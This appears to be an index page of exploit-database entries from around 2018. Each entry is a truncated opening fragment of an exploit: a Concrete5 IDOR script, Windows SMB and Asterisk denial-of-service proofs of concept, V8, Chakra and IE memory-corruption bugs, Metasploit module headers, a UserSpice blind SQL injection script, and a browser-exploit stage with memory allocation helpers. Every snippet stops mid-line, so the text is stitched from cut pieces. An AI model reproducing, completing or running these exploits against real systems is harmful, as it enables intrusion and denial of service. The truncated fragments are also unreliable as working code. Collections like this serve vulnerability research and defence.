#!/usr/bin/env python3 # Concrete5 8.3 vulnerable to Authorization Bypass Through User-Controlled Key (IDOR) # CVE-2017-18195 # Chapman (R3naissance) Schleiss from queue import Queue from threading import Thread from bs4 import BeautifulSoup from ta
# Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service # Date: 26/02/2018 # Exploit Author: Nabeel Ahmed # Version: SMBv3 # Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64) # CVE : CVE-2018-0833 import Soc
function stage4_() { function malloc(sz) { var backing = new Uint8Array(1000+sz); window.nogc.push(backing); var ptr = p.read8(p.leakval(backing).add32(0x10)); ptr.backing = backing; return ptr; } function malloc32(sz) { var backing = new Uint8Array(
# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport- Authors: - Alfred Farrugia alfred@enablesecurity.com - Sandro Gauci sandro@enablesecurity.com- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip
# Segmentation fault occurs in Asterisk with an invalid SDP media format description- Authors: - Alfred Farrugia alfred@enablesecurity.com - Sandro Gauci sandro@enablesecurity.com- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip`- Ref
Chrome: V8: Integer overflow with PropertyArray There's a snippet of the MigrateFastToFast function which is used to create a new PropertyArray object. int number_of_fields = new_map-NumberOfFields(); int inobject = new_map-GetInObjectProperties();
Microsoft Edge: Chakra: JIT: CallRegExSymbolFunction doesn#39;t check the return type The CallRegExSymbolFunction method is used to call symbol functions in regexp objects. But it doesn't check the return value's type. Since the user can define the
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Expl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Expl
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include
#!/usr/env/python Application UserSpice PHP user management Vulnerability UserSpice = 4.3 Blind SQL Injection exploit URL https://userspice.com Date 1.2.2018 Author Dolev Farhi About the App: What makes userspice different from almost any other PHP U
!-- There is a Use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure. This was tested on IE11 running on Window 7 64-bit with the latest patches applied. Note that the PoC was tested in a 64-bit tab p
/* We have discovered a new Windows kernel memory disclosure vulnerability in the creation and copying of a CONTEXT structure to user-mode memory. Two previous bugs in the nearby code area were reported in issues #1177 and #1311 ; in fact, the probl
